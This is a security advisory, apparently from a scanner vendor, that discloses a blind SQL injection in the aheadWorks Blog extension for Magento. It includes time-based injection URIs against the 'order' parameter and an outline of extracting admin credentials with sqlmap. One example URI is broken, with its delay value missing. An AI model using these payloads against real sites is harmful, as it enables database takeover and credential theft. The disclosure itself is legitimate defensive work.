The aheadWorks Blog extension for Magento prior to version 1.3.10 is vulnerable to a critical SQL Injection security flaw. A remote unauthenticated attacker could exploit this vulnerability to take complete control of the affected Magento server and database.
With almost 80,000 downloads at the time of writing, the affected component is the most popular blog component available via Magento Connect.
The SQL Injection flaw was discovered using the AppCheck scanner during preparation for a security seminar.
The exercise involved configuring several popular CMS platforms including WordPress, Joomla, Drupal and Magento along with the most popular plugins available at the time for each platform.
A default AppCheck scan was then performed against each system to demonstrate our ability to discover previously undisclosed security flaws using AppCheck.
Among the discovered vulnerabilities was a Blind SQL Injection flaw within the aheadWorks Blog extension component. AppCheck was able to identify the flaw by triggering a measurable time delay using the MySQL “SLEEP()” function. For example, the following URI will trigger a 10 second time delay when accessed using a web browser:
http://magento_site/blog?dir=desc&order=user AND 1=((SELECT 1 FROM (SELECT SLEEP(10))A)) OR 1234=4321
Compared the following URI that will trigger a 2 second delay:
http://magento_site/blog?dir=desc&order=user AND 1=((SELECT 1 FROM (SELECT SLEEP(
))A)) OR 1234=4321
AppCheck NG employs a range of methods to detect blind SQL injection including time delay inference. Each suspected flaw is confirmed through 15 validation cycles to eradicate false positives.
The attacker could easily exploit this flaw using publicly available exploit tools such as sqlmap (http://sqlmap.org/). By extracting the username and hashed password from the admin_user table, it is possible to obtain Magento administrator credentials via an offline attack.
A demonstration of this flaw is performed at our free application security seminar.
This flaw was reported to aheadWorks on the 22nd of April 2015, a fix was made available on the 27th of May 2015 and can be downloaded via Magento Connect.
No software to download or install.
Contact us or call us 0113 887 8380